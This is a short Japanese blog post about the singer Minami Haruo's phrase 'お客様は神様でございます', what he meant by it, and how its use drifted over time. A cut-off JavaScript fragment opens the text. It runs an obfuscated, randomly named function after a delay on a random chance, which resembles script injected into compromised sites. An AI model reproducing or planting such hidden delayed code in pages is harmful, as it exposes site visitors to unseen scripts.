andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ton200905ヨシィちゃんのひとりごと

お客様は神様だろうか?

「お客様は神様でございます」
2001年(平2)4月14日に亡くなられた大歌手三波春夫さん(以下敬称略)が舞台から観客に語りかけていた言葉です。
派手な和服と明るい笑顔、声は良いし歌も美味い。
紅白31回出場の三波春夫の言葉は、あっと言う間に全国に拡がりました。
ご自身は「お客様に自分が引き出され舞台に生かされる。お客様の力に自然に神の姿を見るのです。
お客様は神様のつもりでやらなければ芸ではない」という思いの発言でお客様に媚びた訳ではないと語っていたそうです。
広がりが大きいほど、時が過ぎるとご本人の気持ちと違う使われ方になることが多い。